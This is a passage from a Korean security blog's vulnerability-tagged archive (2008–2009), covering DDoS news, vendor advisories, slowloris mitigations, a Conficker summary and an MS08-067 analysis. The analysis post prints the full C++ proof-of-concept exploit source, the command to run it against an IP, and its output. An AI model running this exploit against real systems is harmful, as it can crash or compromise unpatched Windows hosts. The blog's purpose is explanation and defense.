태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'취약점'에 해당되는 글 26건

  1. 2009.08.21 네이버카페를 이용한 유령광고 (2)
  2. 2009.07.31 HTS(Home Trading System) 해킹
  3. 2009.07.15 Oracle 7월 긴급 패치(Criticla Patch)
  4. 2009.07.10 7월 10일 - 신종 DDoS 관련 자료
  5. 2009.07.09 7월 8일자 2차 DDoS 공격
  6. 2009.07.08 7월 7일자 신종 DDoS 공격
  7. 2009.07.07 MS 비디오 스트리밍 ActiveX 컨트롤 취약점 주의
  8. 2009.06.22 Apache HTTP DoS 툴 - slowloris (2)
  9. 2009.06.12 Frontpage extension server 취약점(author.dll)
  10. 2009.04.08 Conficker란 무엇이냐~ (3)
  11. 2009.03.23 Conficker C Analysis
  12. 2009.03.16 MS08-067 취약점 정리
  13. 2008.11.10 WPA가 크랙되었다!
  14. 2008.11.05 Adobe Reader/Acrobat 메모리 변조 취약점
  15. 2008.10.29 와이어샤크 취약점 발견
  16. 2008.10.29 ms08-067 취약점에 관한 FAQ
  17. 2008.10.27 ms08-067 소스 분석 및 실행(2008/10/23)
  18. 2008.10.27 Opera 웹브라우져 - 원격 코드 실행 취약점
  19. 2008.10.27 MS08-067 취약점 업데이트 시급
  20. 2008.10.22 cookie sql injection 원리와 대안
  21. 2008.10.02 Celoxis 프로젝트 관리 소프트웨어 XSS 취약점
  22. 2008.10.02 [Ubuntu]OpenSSH 취약점
  23. 2008.09.29 multiple vendor ftpd - Cross-site 요청 위조하기
  24. 2008.09.29 MacAfee SafeBoot Device Encryption 평문 패스워드 노출
  25. 2008.09.28 xss 당한 사이트 정보 보기
  26. 2008.09.27 wireshark 1.0.3 취약점 발견

네이버카페를 이용한 유령광고

┃ Web 2009.08.21 14:05

벌새님이 자세히 설명해주셨습니다.

http://hummingbird.tistory.com/1305

엄청난 JQ...
Trackbacks 0 : Comments 2
  1. Favicon of https://boanchanggo.tistory.com BlogIcon JQ 2009.08.24 17:54 신고 Modify/Delete Reply

    요즘에 모하세요? 저는 이제 쭈욱 박으로 나갈듯 합니다.

    젠장 9월 30일 시험 보려 학교 방문해야 된다고 하네요

    • Favicon of https://suban.tistory.com BlogIcon suban 2009.08.25 14:43 신고 Modify/Delete

      나야 돌+i 들과 싸우고 있지~ ㅋㅋ
      셤보러 나도 가야하나..ㅡ,.ㅡ;

Write a comment


HTS(Home Trading System) 해킹

┃ Application 2009.07.31 11:58

HTS 해킹
[출처] HTS 해킹|작성자 iwillhackyou
http://blog.naver.com/iwillhackyou/110046959718


웬지 이걸 주제로 한 영화가 만들어지면 잼있을거같...아닌가??? ㅋ
Trackbacks 0 : Comments 0

Write a comment


Oracle 7월 긴급 패치(Criticla Patch)

┃ Application 2009.07.15 14:02
오라클에서 긴급패치를 발표했습니다. 30개의 취약점에 대한 업데이트네요.



Oracle has released its Critical Patch Update for July 2009 to address 30 vulnerabilities across several products.

This update contains the following security fixes:

  • 10 for the Oracle Database Server
  • 2 for Oracle Secure Backup
  • 2 for the Oracle Application Server
  • 5 for Oracle Applications
  • 2 for Oracle Enterprise Manager
  • 3 for the Oracle PeopleSoft and JDEdwards Suite
  • 1 for the Oracle Siebel Suite
  • 5 for the Oracle BEA Products Suite 

 

-------------------------------------------------------------------------------------------

Oracle Critical Patch Update Advisory - July 2009

 

 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html

-------------------------------------------------------------------------------------------

 

Trackbacks 0 : Comments 0

Write a comment


7월 10일 - 신종 DDoS 관련 자료

┏ Interesting News 2009.07.10 03:34

개요도 및 피해방지법이 이미 나왔네요.. 요기->http://viruslab.tistory.com/896

ㅎㅎ;;

정말 부지런하신 것 같아요! 대단하십니다.

일단 디스크 파괴(mbr파괴죠)로 끝날 것 같다는 느낌이지만 방심하지 않고 있습니다.

일단 바이러스 감염 후 증상들에 대한 개요도들만 주구장창 나오지 정작 중요한 유입경로, 유포지 등은 밝혀내지 못하고 있습니다.

또한 북한이니, 미국이니 하는거 아직 확실히 밝혀진바 없는걸로 알고 있습니다.(현재로써는...)


여튼..

국민 전체가 바이러스 점검에 신경쓰지 않는 이상 막을 수 없는 이번 공격에 대해...보안전문가들은 머하고 있었느냐는 식의 기사를 쓴 기자들은 각성해야 합니다. 그런 기사보면 완전 기분 쉣이죠..ㅡㅡ;

초등학교때부터 이제 보안 수업을 시켜야 한다고 생각합니다. 진심으로...


***********************************************************************************************

▲안철수연구소 전용백신(http://home.ahnlab.com)

▲하우리 전용백신(http://www.hauri.co.krl)

▲바이러스체이서 전용백신(http://www.viruschaser.com)

▲알약 전용백신(http://alyac.altools.co.kr)

▲네이버 PC그린 전용백신(http://security.naver.com)

▲잉카인터넷 전용백신(http://www.inca.co.kr)

Trackbacks 0 : Comments 0

Write a comment


7월 8일자 2차 DDoS 공격

┏ Interesting News 2009.07.09 08:35


2차 공격이 어김없이 들어왔네요.

http://viruslab.tistory.com/891

관련 기사

- ‘7·7 DDoS 공격’ 누가?… 왜?
http://www.segye.com/Articles/News/Politics/Article.asp?aid=20090708004211&ctg1=06&ctg2=00&subctg1=06&subctg2=00&cid=0101010600000

- 美, 공격 경유지 한국 지목, 트래픽 차단 조치
http://www.zdnet.co.kr/ArticleView.asp?artice_id=20090708155446

- “2차 공격 새 좀비PC 사용”
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=1247065206&cDateYear=2009&cDateMonth=07&cDateDay=09

- 방통위 ‘좀비PC’ 인터넷 접속 제한 요청
http://www.seoul.co.kr/news/newsView.php?id=20090709800005

- 오늘 오후 6시 ‘3차 공격’ 온다
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=090709100557&cDateYear=2009&cDateMonth=07&cDateDay=09

- 국가정보원 “北·종북세력이 사이버테러”
http://www.fnnews.com/view?ra=Sent0701m_View&corp=fnnews&arcid=090708223047&cDateYear=2009&cDateMonth=07&cDateDay=09

Trackbacks 0 : Comments 0

Write a comment


7월 7일자 신종 DDoS 공격

┏ Interesting News 2009.07.08 11:38

개인 컴퓨터에 감염된 악성코드에 의해 DDoS가 발생한 것으로 나타나고 있는데 더 자세한 내용은 밝혀지지 않고 있다고 합니다.

관련 기사 및 공격 대상 사이트 목록은

http://viruslab.tistory.com/889

을 참조하시기 바랍니다.

p.s. 리스트보면 웬지 북한 냄새가...


*** 추가 ***

관련 기사

http://www.boannews.com/media/view.asp?idx=16962&kind=0

http://www.boannews.com/media/view.asp?idx=16968&kind=0

http://news.naver.com/main/read.nhn?mode=LPOD&mid=sec&sid1=001&sid2=140&oid=001&aid=0002754811&isYeonhapFlash=Y

http://www.dt.co.kr/contents.html?article_no=2009070902010151739002

http://www.dt.co.kr/contents.html?article_no=2009070902010351739002


제 개인적 견해이지만...대국민 보안 교육을 시켜야 한다고 생각합니다. 솔직히 이런 방법 말고는 아무리 보안전문가가 노력한다고 해도 거기서 거기라고 생각합니다....ㅡㅡ;;
Trackbacks 0 : Comments 0

Write a comment


MS 비디오 스트리밍 ActiveX 컨트롤 취약점 주의

ⓤ System 2009.07.07 22:58

비디오 스트리밍 activex 컨트롤에 버퍼오버플로우 취약점이 발견되었다네요.

자세한 내용은 아래 링크를 참조하세요.


KISA : http://www.krcert.or.kr/index.jsp

xiang 블로그 : http://safelab.spaces.live.com/blog/cns!A6B213403DBD59AF!1420.entry

 

Trackbacks 0 : Comments 0

Write a comment


Apache HTTP DoS 툴 - slowloris

ⓤ System 2009.06.22 08:58


SANS Diary에 새로운 유형의 Apache HTTP DoS 툴(slowloris)에 관한 글이 올라왔네요.

SANS 기사에는 툴(소스코드)에 대한 링크가 존재하지 않았으나, 구글 검색으로 쉽게 찾을 수 있었으며 해당 툴에 대한 조작이 쉬워 국내에서도 이를 통한 공격이 발생할 것으로 보입니다.

#################################################################################

1. 공격 방식

  1.1. 기존 공격방식 : 단시간에 많은 HTTP/TCP 패킷을 서버로 전송해 부하를 일으킴

    >> 해결방법 : Apache와 같은 웹서버에서 순간적으로 접속이 증가하는 IP를 차단시키는 기능을 이용

  1.2. 'slowloris' 공격방식 : 정상적인 connection을 서버와 맺은 후 미완성된 HTTP 헤더를 서버로 전송해 connection을 연결시킨채 서버가 대기상태로 머물러 있게함, 결국 connection이 해제되지 않아 서버가 추가적인 요청을 받아들일 수 없게됨(느린 성능의 PC에서도 서버에 큰 부하를 줄 수 있음)

    >> 해결방법 : 임시로 서버의 max connection수를 증가시켜 공격을 지연시킬 수 있으나 궁극적인 해결책은 아니며, 현재 특별한 조치방법은 없다고 함

2. 취약 웹서버
  - Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid

3. 안전한 웹서버
  - IIS6.0, IIS7.0, lighttpd

4. 참고사이트
  - http://isc.sans.org/index.html?on=diary (SANS Diary 원문)
  - http://ha.ckers.org/slowloris/ (툴 설명 및 다운로드 가능)

Trackbacks 0 : Comments 2
  1. 엔신 2009.06.23 00:15 Modify/Delete Reply

    음... max connection을 어느정도 증가시키고,
    Timeout과 KeepAliveTimeout를 1~5 초 정도로 짧게 주어서
    연결 지속시간을 짧게 만드는 것도 어느정도는 효과를 볼 수 있겠네요.
    어찌됐거나....세상 무섭네요...

    • Favicon of https://suban.tistory.com BlogIcon suban 2009.06.23 08:23 신고 Modify/Delete

      저도 이런거 보면 무서워요^^; 엔신님이 말씀하신 방법외에도 mod_limitipconn 모듈 사용, Apache 서버 앞단에 Reverse proxy 사용(Perlbal, nginx)으로 완화 방안이 있습니다. 또 안전한 웹서버도 디폴트 설정은 취약하니 설정 꼭 변경해 주시고요. 그럼 참고하세요~

Write a comment


Frontpage extension server 취약점(author.dll)

┃ Web 2009.06.12 09:53

홈페이지 변조건을 분석하다 알아낸 정보입니다. 드문 방법으로 웹해킹을 당한 것 같은데, 제가 경험이 부족해서 그런진 몰라도 처음보므로 포스팅하여 관련자 분들께 조금이나마 도움을 드릴까 합니다.

1. 사건 개요
IIS6.0을 사용하고 있었고, 웹서버 로그를 분석해보니 /_vti_aut/author.dll 에 대한 접근 기록을 발견하였다.

2. 대응 방법
이에 author.dll를 키워드로 검색한 결과, 관련 파일은 frontpage extension server와 관련되어 있었고 다음과 같은 2가지 이유로 인한 취약점으로 웹해킹이 이루어질 수 있다는 것을 알았다.

1) 보안업데이트 미패치

-> 해결법 : 관련보안패치

(참고)

http://www.microsoft.com/korea/technet/security/bulletin/MS03-051.mspx

http://www.microsoft.com/korea/technet/security/bulletin/MS06-017.mspx

 

2) Frontpage extension server 보안설정

-> 해결법 : IIS에서 Frontpage extension server 보안설정 강화

 

 


Trackbacks 0 : Comments 0

Write a comment


Conficker란 무엇이냐~

┏ Analysis 2009.04.08 17:16

2008년도...나름 2008년도 최고의 작품이라고도 불리는 conficker...

이놈이 ms08-067 취약점이 발표되고나서 탄생하더니 굉장히 많이 발전했다. 처음 ms08-067취약점이 발견될 당시 짧은 내 소관으론 밀웜에서 익스플로잇 좀 뜨다 말겠지 했지만...천만의 말씀 만만의 콩떡~! 예상을 완전 뒤엎고 호랑이새끼 한마리가 태어났으니... 그 이름 conficker(downadup)!!

4월1일 만우절 바이러스에 비상이 걸리며 여러 보안업체에서 conficker에 대한 변종 이력과 기능에 대해서 분석한 자료들을 만들어 냈다. 또한 회사에서도 비상이 걸린 것!! 하루에 만우절 바이러스에 대한 문의가 폭주...입에 단내가 나도록 상담했다.

이하 내용은 여기저기서 본 머리속의 자료들을 짜깁기한 것이다. 보기에 알기 쉽고 내 머리속에 정리하는 차원에서 작성해보겠다.
 

1. 변종 이력
 Conficker.A(Downadup)
2008.11.21
Conficker.B/C(Downadup.B)
2008.12.30
Conficker.D(Downadup.C)
2009.3.6
<전파>
ms08-067 취약점 공격
<전파>
파일(네트워크) 공유(brute force)
이동식 미디어 감염(USB)
<전파>
없음 
<C&C>
HTTP
<C&C>
HTTP
초보적인 P2P
<C&C>
개선된 HTTP
강력한 P2P 
<보호기능>
없음
<보호기능>
일부 DNS 조회 중지
자동 업데이트 중지
HTTP 코드 서명 이용
P2P 코드 서명 이용
<보호기능>
일부 DNS 조회 중지
자동 업데이트 중지
P2P 및 HTTP 코드 서명 이용
보안 소프트웨어 중지
개선된 분석 방지(분석도구 실행 방지)

* symantec에서는 downadup이라고 명명함.

위와 같이 conficker는 짧은 시간에 진화되었다.

conficker의 대표적인 특징을 살펴보면

2. 특징

▷ HTTP : conficker 안의 도메인 생성 알고리즘을 통해 생성된 도메인으로부터 악성코드를 다운로드 받는다. 또는 봇넷을 업데이트까지 한다. 이러한 메커니즘을 phonig-home 또는 internet rendezvous라고 한다. 매일 5만개의 도메인을 생성한 후 그 중에서 업데이트를 확인할 500개의 도메인을 임의로 선택한다. 또는 필요한 정보(시간이나 위치)를 수집하거나 악성코드를 다운로드 및 실행한다.

▷ P2P : B부터는  P2P 프로토콜을 사용하여 HTTP C&C 채널을 사용하지 않고도 봇넷을 업데이트 할 수 있도록 했다. 게다가 봇넷을 방어하기 위해 디지털 서명 기능을 포함했다. conficker는 감염되면 시스템 및 네트워크의 정보를 모두 수집하여 이것을 기반으로 IP 및 도메인을 생성한다. 실행시에는 레지스트리에 저장된 키로부터 얻은 값과 다른 값들을 시드 값으로 사용하는 난수 함수를 사용해 임의로 생성되거나, 이전에 캐시된 2048개의 피어목록에서 임의로 선택된다. 캐시된 피어들은 두개의 특정 레지스트리 키에 암호화되어 저장된다.

감염된 봇넷들의 시스템들은 서로 간의 통신을 위해 특수하게 제작된 P2P 프로토콜이 사용된다. TCP, UDP포트에 모두 적용되고, 패킷분석을 어렵게 하기 위해 패킷에 임의의 데이터가 추가된다.(대략 이정도만..)

▷ 보호기능 : 웜 제작자는 코드 압축을 완전히 풀더라도 해당 바이너리를 분석하기 어렵게 만들기 위해 추가적인 조치들을 취했다. 
  - 가상화 방지, 추적 방지 : 네트워크상에서 VM 탐지 방법으로, SLDT, SIDT, STR, SGDT, VMware I/O Port magic, invalid VirtualPC opcode 가 사용되었다.
  - 보안기능 중지 : sysinternal 도구들은 물론 거의 대부분의 분석도구들과 관련된 프로세스들을 찾아 종료시키려고 시도한다.
  - DNS 조회 후킹 : 여러 보안 도메인에 대한 접속 시도를 가로채기 위해 다양한 DNS관련 Windows API 기능을 후킹한다.
  - GetTickCount() 타이밍을 사용한 안티 디버깅
  - 디지털 서명(RC4, RSA, MD6)
  - 또한 해당 버그를 다시 공격하지 못하도록, 해당 취약점에 대해 메모리상의 우회 패치를 수행한다. 이말은 즉슨, ms08-067취약점 패치를 수행한 것으로 시스템을 속여 진짜 패치를 받지 않게 만들거나 다른 ms08-067취약점을 이용한 악성코드가 침투하지 않도록 한다.

이상이 conficker에 대한 개략적인 정리이다.

마지막 변종이 전파기능이 없는 것으로 보아 웜 제작자들은 기존 감염된 시스템의 감염 기간을 늘리고, 아직 알려지지 않은 목적을 위해 사용할 수 있도록 보호하는데 집중하고 있는 것으로 보인다.

ms에서 현상금까지 내건 conficker 제작자들은 어디에 숨어 있는 것이고... 또 누구일까? 잡히면 분명 대서특필할 것 같다.
Trackbacks 1 : Comments 3
  1. Favicon of https://suban.tistory.com BlogIcon suban 2009.04.09 09:53 신고 Modify/Delete Reply

    '추가시켜드릴게요~' 그러면 내가 마치 부탁하는거 같자나...ㅡ,.ㅡ;

  2. Favicon of https://boanchanggo.tistory.com BlogIcon JQ 2009.04.15 22:54 신고 Modify/Delete Reply

    올만에 형 블로그에 댓글을 남기네요~~ ^^ 이거 제 글에 링크 할게요~~ 예민하셔

Write a comment


Conficker C Analysis

┏ Analysis 2009.03.23 13:25

SRI International에서 Conficker paper를 업데이트하였습니다.

Conficker의 변종인 Conficker C를 다루고 있습니다.

 

Title: Conficker C Analysis

Author: Phillip Porras, Hassen Saidi, and Vinod Yegneswaran

Source: SRI International

Date Published: 19th March 2009

 

http://mtc.sri.com/Conficker/addendumC/

Trackbacks 0 : Comments 0

Write a comment


MS08-067 취약점 정리

ⓒ Network 2009.03.16 08:52

보안뉴스에서 MS08-067에 대한 내용을 잘 정리해 주었네요.

☞ 기사보기

'ⓒ Network' 카테고리의 다른 글

DDOS 대처 방법  (0) 2010.01.24
wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Trackbacks 0 : Comments 0

Write a comment


WPA가 크랙되었다!

ⓒ Network 2008.11.10 11:47
아래는 원문을 번역해 본 것입니다.
대략 요약하면 도쿄에서 열리는 PacSec conference에서 Erik Tews분이 WPA 크랙 방법을 보여준다고 하네요. 기업들은 대부분 WPA로 넘어가고 있는데 이 크랙이 만약 제대로 된 공격이라면 상당한 쇼크를 줄 것으로 예상이 된다고 합니다. 개인 사용자들은 WPA2 및 가상 개인 네트워크(VPN)을 구축하면 되지만 여전히 접속은 WPA로 해야하기 때문에 취약할 수 밖에 없다고 전망하고 있습니다.

원문:http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119258

WPA암호화가 크랙된다!

보안 연구자가 많은 무선 네트워크에서 데이터를 보호하기 위해 사용하는 Wi-Fi Protected Access(WPA)암호화 표준을 부분적으로 크랙하는 방법을 개발했다고 발표했다.
WPA에서 부분적 공격으로 설명된 공격은 다음 주 도쿄에서 PacSec conference에서 거론될 것이다. Erik Tews 연구원은 WPA 암호화 크랙이 가능했던 방법과 라우터에서 랩탑 컴퓨터로 보내지는 데이터를 읽는 방법을 보여줄 것이다. 공격은 또한 라우터에 연결된 클라이언트에 보거스 정보를 보내는데 사용될 수 있다.
이렇게 하는 것은 Tews와 공동연구자 Martin Beck 이 상대적으로 짧은 시간(12~15분)에 WPA를 사용하여 TKIP을 깨는 방법을 찾았기 때문이다.
하지만 그들은 이 특별한 공격으로 PC에서 라우터까지 가는 데이터를 안전하게 하기 위해 사용되는 암호화키는 크랙하지 않았다. 보안 전문가는 TKIP이 사전공격과 같은 무엇인가를 사용하여 크랙될 수 있다는 것을 알았다. 대량의 계산 자원을 사용하여 공격자는 문선 데이터를 안전하게 하기 위해 사용된 키가 무엇인지 엄청난 능숙한 추측을 만들어 근본적으로 암호화를 크랙한다.
하지만 Tews와 Beck의 작업은 사전공격을 포함하지 않는다.
그들이 트릭이 성공하기 위해서 연구자들은 먼저 많은 양의 데이터를 보내어 WPA라우터를 트릭하기 위한 방법을 찾았다. 이것은 쉽게 키를 크랙할 수 있었지만 이 기술은 mathematical breakthrough와 결합된다. 전의 시도보다 더욱 빠르게 WPA를 크랙할수 있도록 했다.

Tews는 다가오는 다음 달에 아카데믹 저널에 암호화 작업을 발표하려고 계획하고 있었다. 공격에 사용된 몇개의 코드가 이주 전에 Beck의 Aircrack-ng의 Wi-Fi 암호화 해킹 툴에 말없이 추가되었다.
WPA는 오늘날 Wi-Fi 네트워크에서 널리 사용되고 1990년대 후반에 개발된 본래의 WEP표준을 대체할 것이라고 간주되었다. 하지만 WEP 이후의 발전후에도 해커들은 그것의 암호화를 깨는 방법을 찾았고 지금 보안 전문가들은 불안해 하고 있다. 상점 체인 T.J. Maxx는 2년동안 훔쳐진 십억개 이상의 신용카드 번호가 US에서 널리 공개된 경험을 한후 WEP에서 WPA 암호화로 업그레이드 하는 과정 중이었다.
WPA2로 알려진 새 무선 표준이 Tews와 Beck에 의해 개발된 공격으로부터 안전하다고 간주된다. 하지만 많은 WPA2 라우터 또한 WPA를 지원한다.

"모든 사람이 말한다.'WPA로 가라. WEP가 깨졌다.'" Ruiu가 말한다. "이것은 WPA에 길들여 지고 있다는 뜻이다"

만약 WPA가 크게 기능발휘하지 못한다면 WPA를 점진적으로 적용해가고 있는 엔터프라이즈 소비자들에게 큰 타격이 될것이라고 무선 네트워크 보안 벤더 AirTight Networks의 상품관리의 부회장이 Sri Sundaralingam이 말했다. 비록 소비자들은 이 공격으로부터 보호하기 위해 WPA2나 가상 개인 네트워크 소프트웨어와 같은 Wi-Fi 기술을 적용할수 있지만 여전히 WPA를 사용하여 네트워크 또는 완전히 크랙된 WEP 표준에 접속할 것이다.


'ⓒ Network' 카테고리의 다른 글

wireshark GeoIP 지원  (0) 2009.10.21
MS08-067 취약점 정리  (0) 2009.03.16
WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Cisco 장비 취약점 진단 도구, Nipper  (0) 2008.05.23
Trackbacks 0 : Comments 0

Write a comment


Adobe Reader/Acrobat 메모리 변조 취약점

┃ Application 2008.11.05 11:09

어도비 애플리케이션 pdf와 acrobat에서 다량의 취약점이 발견되었네요.



1. Adobe Acrobat/Reader "util.printf()" Buffer Overflow

[해당 소프트웨어]
Adobe Acrobat / Reader version 8.1.2

[취약점 설명]
Secunia Research는 Adobe Acrobat/Reader에서 취약점을 발견하였는데, 이는 악성 해커에 의해서 취약한 사용자의 시스템이 공격 당할 수 있습니다.

이 취약점은 "util.printf()"함수에서 부동 소수점 지정자(specifier)를 포함하는 포맷 스트링을 파싱 할때 boundary error로 인해서 발생하고, 변조된 PDF를 통한 스택 기반

버퍼 오버 플로우로 인해서 공격당할 수 있다.

이 공격이 성공하면 PDF파일을 볼 때 비정상 코드를 실행 할 수 있게 된다.

[해결방법]
vendor에서 11/04일에 패치를 발표하였다.




2. Adobe Reader Embedded Font Handling Out of Bounds Array Indexing Vulnerability

[설명]
어도비 리더에서 배열의 경계를 벗어난 접근 취약점을 이용한 원격 공격은 공격자가 현재 사용자로써 악성코드를 실행할 수 있도록 한다.

취약점은 특히 Type 1 fonts의 파싱을 담당하는 코드안에 존재한다. 메모리 영역을 할당한 후에 경계 체크를 수행하지 않는다. 그 후에 이 메모리의 접근은 악성 코드의 실행을 가져오는 악성 메모리의 변형으로 결과가 나타날 수 있다.

[분석]
이 취약점 공격은 원격 공격자가 현재 사용자권한으로 악성 코드를 실행할 수 있도록 한다. 이 취약점을 이용하기 위해, 공격자는 타겟 사용자가 악의적으로 생성한 파일을 열도록 확신해야만 한다. 또는 이메일에 첨부된 PDF파일이나 PDF파일이 포함된 웹사이트에 방문했을 때 파일들을 열도록 한다. 더이상 상호작용이 요구되지는 않는다. 문서의 thumbnail보기를 표시하는 익스플로러 확장 AcroRd32info 또한 취약하다. 이것은 PDF파일을 열어보지 않고서 단순히 클릭만 하여도 이용될 수 있는 취약점이다.

[탐지]
Adobe Reader version 8.1.1.

[대안]
효과적인 대응책은 없지만 브라우져에서 애플리케이션을 열지 않도록 설정하는 것은 웹기반 공격ㅢ 노출을 경감시켜 준다.
벤더에서 패치를 릴리즈 했다.

http://www.adobe.com/support/security/bulletins/apsb08-19.html




3. Adobe Acrobat And Reader AcroJS Heap Corruption Vulnerability

[설명]
Acrobat 프로페셔널과 Reader에서 힙 부정 취약점의 원격 공격이 공격자에게 현재 사용자 권한으로 악성코드를 실행할 수 있도록 해준다.

취약한 코드는 PDF문서의 스크립팅 코드 안에서 볼 수 있는 AcroJS 함수이다. 이 함수는 HTTP인증에 사용된다. 이 함수에 긴 문자열을 통과시킴으로써, 악성코드의 실행을 유발하는 방법으로 힙메모리를 변조할 가능성이 있다.

[분석]
이 취약점 공격은 공격자가 현재 사용자의 권한으로 악성코드를 실행할 수 있도록 해준다. 이 취약점을 이용하기 위해서, 공격자는 악의적으로 만든 파일을 타겟 사용자가 PDF가 포함되어진 웹사이트를 방문하거나 파일을 열도록 해야 한다. 만약 사용자가 어도비 리더 브라우져 플러그인을 활성화했다면, PDF파일이 브라우져에 표시될 것이다.

[탐지]
Acrobat Professional and Adobe Reader version 8.1.2. 이하

[대응]
어도비 리더나 어크로뱃의 자바스크립트를 비활성화하는 것으로 취약점 노출을 막을 수 있다. 자바스크립트가 비활성화 되면 어도비 리더는 사용자에게 문서의 몇몇 부분이 기능하지 않는다고 알린다. 그리고 그것을 활성화하기 위한 기회를 제공한다.
패치가 릴리즈 되었다.
http://www.adobe.com/support/security/bulletins/apsb08-19.html
Trackbacks 0 : Comments 0

Write a comment


와이어샤크 취약점 발견

┃ Application 2008.10.29 09:34


다수의 취약점이 와이어샤크에서 발견디었는데 악성패킷을 처리하는 동안 충돌 또는 종료를 유발한다고 합니다.

다음과 같은 문제점이 있다고 합니다.
- Bluetooth ACL dissector가 충돌하거나 중단됨
- Q.931 dissector가 충동하거나 중단됨
- Tamos Commview capture 파일들을 읽는 동안 중단됨
- USB dissector가 충돌하거나 중단됨.
- PRP와 MAE dissector가 와이어샤크 충돌을 유발함

와이어에 악성 패킷들을 주입하거나 악성 패킷 trace 파일을 읽도록 누군가를 유혹함으로써 와이어샤크 충돌을 유발할 가능성이 있다고 합니다.

Wireshark 1.0.4로 패치하시기 바랍니다.

참조 :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4680
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4681
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4682
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4683
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4684
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4685
 http://www.wireshark.org/security/wnpa-sec-2008-06.html

Trackbacks 0 : Comments 0

Write a comment


ms08-067 취약점에 관한 FAQ

ⓤ System 2008.10.29 09:32

SecuriTeam 블로그에 취약점에 관한 질의응답 형태로 취약점에 관한 윤곽을 잡을 수 있도록 한 FAQ가 포스팅되었네요.

참고하세요.

링크 : http://blogs.securiteam.com/index.php/archives/1150

Trackbacks 0 : Comments 0

Write a comment


ms08-067 소스 분석 및 실행(2008/10/23)

ⓤ System 2008.10.27 09:30


2008/10/23일자 익스플로잇에 대한 분석입니다.
서버서비스만 죽이는 것 같네요.

*******************************************************************************

이 소스코드 문제가 있는 것 같네요..ㅡㅡ;

srvsvc.idl에 정의된 _NetprPathCanonicalize 함수가 srvsvc_killer.cpp에서 호출될 때

함수 argument 개수가 맞지 않네요

소스 수정 후 실행해도 NdrClientCall2 함수에서 에러를 리턴합니다.


*******************************************************************************


milw0rm에 릴리즈된 exploit을 다운로드 받아 압축을 풀어보면

mk.bat
MY_HASH.TXT
srvsvc.idl
srvsvc_killer.cpp
README.TXT

의 파일이 존재합니다.

아래는 exploit의 cpp소스코드입니다.

-------------------------------------------------------------------------------
#include <windows.h>
#include "srvsvc.h"
#include <stdio.h>

extern "C" PVOID __stdcall MIDL_user_allocate(size_t s) { return malloc(s); }
extern "C" VOID __stdcall MIDL_user_free(PVOID p) { free(p); }

int main(int argc, char **argv)
{
  RPC_STATUS status;
  unsigned char *strBind = 0;
  handle_t handle;

  status = RpcStringBindingComposeA(0, // object uuid
 (RPC_CSTR)"ncacn_np", // protseq
 (RPC_CSTR)argv[1], // net addr
 (RPC_CSTR)argv[2], // endpoint
 0,
 &strBind);
  if (status) { printf("%d\n", status); return status; }

  printf("%s\n", strBind);

  status = RpcBindingFromStringBinding(strBind, &handle);
  if (status) { printf("%d\n", status); return status; }

  RpcTryExcept {
    unsigned char x[1000];
    long q = 1;
//    _NetprPathCanonicalize(handle, L"AAA", L"BBB", x, 1000, L"", &q, 0x100);
    _NetprPathCanonicalize(handle, L"AAA", L".\\\\x\\..\\..\\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", x, 1000, L"", &q, 1);
  } RpcExcept(EXCEPTION_EXECUTE_HANDLER) {
    unsigned long code = RpcExceptionCode();
    printf("WAHAHAH %d %08x\n", code, code);
  } RpcEndExcept

  printf("hi\n");
}
-------------------------------------------------------------------------------

위 소스코드 중 _NetprPathCanonicalize api구조를 보면

-------------------------------------------------------------------------------
long _NetprPathCanonicalize(
   /* [string][unique][in] */ wchar_t __RPC_FAR *arg_1,
   /* [string][in] */ wchar_t __RPC_FAR *arg_2,
   /* [size_is][out] */ unsigned char __RPC_FAR *arg_3,
   /* [range][in] */ long arg_4,
   /* [string][in] */ wchar_t __RPC_FAR *arg_5,
   /* [out][in] */ long __RPC_FAR *arg_6,
   /* [in] */ long arg_7);
-------------------------------------------------------------------------------

와 같습니다.

실행방법은 mk.bat를 실행한후 아래와 같이 입력합니다.

-------------------------------------------------------------------------------
D:\srv\ms08-067>die \\172.21.119.135 \pipe\srvsvc
ncacn_np:\\\\172.21.119.135[\\pipe\\srvsvc]
WAHAHAH 1727 000006bf
hi
-------------------------------------------------------------------------------

Trackbacks 0 : Comments 0

Write a comment


Opera 웹브라우져 - 원격 코드 실행 취약점

┃ Application 2008.10.27 08:45

